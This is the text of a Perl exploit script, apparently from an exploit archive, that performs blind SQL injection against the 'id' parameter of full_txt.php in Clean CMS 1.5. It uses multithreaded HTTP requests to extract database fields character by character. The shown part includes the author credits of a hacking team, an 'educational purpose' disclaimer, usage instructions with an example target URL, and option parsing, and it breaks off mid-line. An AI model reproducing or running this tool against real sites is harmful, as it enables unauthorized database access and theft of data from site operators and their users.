Clean CMS 1.5 full_txt.php id Blind SQL Injection Exploit.pdf

1 # Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit 2 # url: http://www.4yoursite.nl/script_clean_cms.php 3 # 4 # Author: JosS 5 # mail: sys−project[at]hotmail[dot]com 6 # site: http://hack0wn.com && spanish−hackers.com 7 # team: Spanish Hackers Team − [SHT] 8 # 9 # This was written for educational purpose. Use it at your own risk. 10 # Author will be not responsible for any damage. 11 # 12 # Hack0wn :D 13 14 my $MAX_FIELD_LENGTH = 200 ; 15 my $EXIT_IF_NO_CHAR = 1 ; 16 my $DEFAULT_THREADS = 15 ; 17 my $DEFAULT_THREADS_TIMEOUT = 30 ; 18 my @ascii = ( 32 .. 123 ) ; 19 my $DEFAULT_THREADS_TIME = 1 ; 20 21 22 use LWP::UserAgent ; 23 24 sub _HELP_AND_EXIT 25 { 26 die " 27 28 ./$0 −u <url> −p <pattern> 29 30 Options: 31 −u <url> Ex: http://localhost/full_txt.php?id=19 32 −p <pattern> HTML pattern. 33 34 Other: 35 −t <#> Threads, default ’$DEFAULT_THREADS’. 36 −l <#> Maximum table name length ’$MAX_FIELD_LENGTH’. 37 −T <#> Timeout. 38 −h Help (also with −−help). 39 40 Example: 41 42 ./$0 −u \"http://localhost/full_txt.php?id=19\" −p Concurso 43 44 " ; 45 } 46 47 48 my ($p, $w) = ({ @ARGV }, { }) ; 49 50 map { 51 &_HELP_AND_EXIT if $_ eq ’−−help’ or $_ eq ’−h’ ; 52 } keys %$p ; Page 1/4 Clean CMS 1.5 full_txt.php id Blind SQL Injection Exploit JosS 11/25/2008 53 54 map { 55 die "[!] Require: $_\n[!] Help: ./$0 −−help\n" unless $p−>{ $_ } ; 56 } qw/−u −p/ ; 57 58 $p−>{’−t’} = ( $p−>{’−t’} and $p−>{’−t’} =~ /^\d+$/ ) ? $p−>{’−t’} : ( $w−>{’−t’} = $DEFAULT_THREADS ) ; 59 $p−>{’−l’} = ( $p−>{’−l’} and $p−>{’−l’} =~ /^\d+$/ ) ? $p−>{’−l’} : ( $w−>{’−l’} = $MAX_FIELD_LENGTH ) ; 60 $p−>{’−T’} = ( $p−>{’−T’} and $p−>{’−T’} =~ /^\d+$/ ) ? $p−>{’−T’} : ( $w−>{’−T’} = $DEFAULT_THREADS_TIMEOUT ) ; 61 62 map { 63 warn "[i] Getting default: $_ $w−>{ $_ }\n" ; 64 } sort keys %$w ; 65 66 ( &_IS_VU